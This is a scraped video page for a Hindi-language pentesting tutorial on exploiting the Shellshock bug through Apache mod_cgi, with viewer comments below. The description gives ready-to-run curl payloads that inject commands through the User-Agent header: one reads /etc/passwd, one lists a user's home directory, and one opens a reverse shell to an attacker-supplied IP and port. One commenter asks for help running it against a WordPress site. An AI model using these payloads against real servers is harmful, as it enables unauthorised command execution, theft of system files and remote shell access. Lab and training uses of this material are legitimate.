Тёмный

Apache mod_cgi - Shellshock- Remote Command Injection | Manually Exploit | POC | Explain in Hindi 

PentestHint - The Tech Fellow
Подписаться 4,2 тыс.
Просмотров 1,2 тыс.
50% 1

#Exploit-DB #ShellShock #RemoteCommandInjection #PentestHint #pentesthint #chandanghodela
Join this channel to get access to perks:
/ @pentesthint
What is Shellshock?
Shellshock is a critical bug in Bash versions 1.0.3 - 4.3 that can enable an attacker to execute arbitrary commands. Some web servers (including Apache) support the Common Gateway Interface (CGI) specification which allows CLI programs to be used to generate dynamic pages.
To check if the site is vulnerable to Shellshock, we can run the following code:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' example.com//cgi-bin/test.cgi
Ryan's Directory
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/ls -al /home/ryan/' bash -s :'' 10.10.155.108//cgi-bin/test.cgi
Reverse Connection:
curl -H 'User-Agent: () { :; }; /bin/bash -i gt& /dev/tcp/YourIP/YourPort 0gt&1' example.com/cgi-bin/test.cgi
Notes: drive.google.com/file/d/1-yk1...
Exaploit-DB: www.exploit-db.com/exploits/3...
----------------------------------------------------------------
Follow:
Twitter: / chandanghodela
Instagram: / chandan.ghodela
LinkedIn: / chandan-singh-ghodela

Опубликовано:

 

16 авг 2022

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 9   
@Reelix
@Reelix Год назад
Weird that this worked with a typo in the curl command creating a random header instead of appending onto the UA one :)
@yashchavan5685
@yashchavan5685 Год назад
Osm
@PentestHint
@PentestHint Год назад
Thanks buddy
@jay-india
@jay-india Год назад
Nice trrick
@PentestHint
@PentestHint Год назад
Thanks 😊
@jay-india
@jay-india Год назад
@@PentestHint welcome brother
@godwinetebom2761
@godwinetebom2761 5 месяцев назад
Hi I love your video
@PentestHint
@PentestHint 5 месяцев назад
Thanks 🤩
@godwinetebom2761
@godwinetebom2761 5 месяцев назад
@@PentestHint I use it to scan a WordPress but he's not working please can you help
Далее
Crazy Girl destroy RC CARS 👩🤪🚘🚨
00:20
Просмотров 5 млн
Shellshock Vulnerability and Attack
5:19
Просмотров 18 тыс.
OWASP Top 10 Vulnerabilities in Hindi
17:22
Просмотров 30 тыс.
Hacker's Guide to UART Root Shells
17:40
Просмотров 464 тыс.
How To Hack IoT Cameras - Vulnerability Demonstration
20:26
OpenSSH for Absolute Beginners
23:00
Просмотров 99 тыс.
Exploit Shellshock on a Web Server Using Metasploit
6:34
Bill Gates Reveals Superhuman AI Prediction
57:18
Просмотров 51 тыс.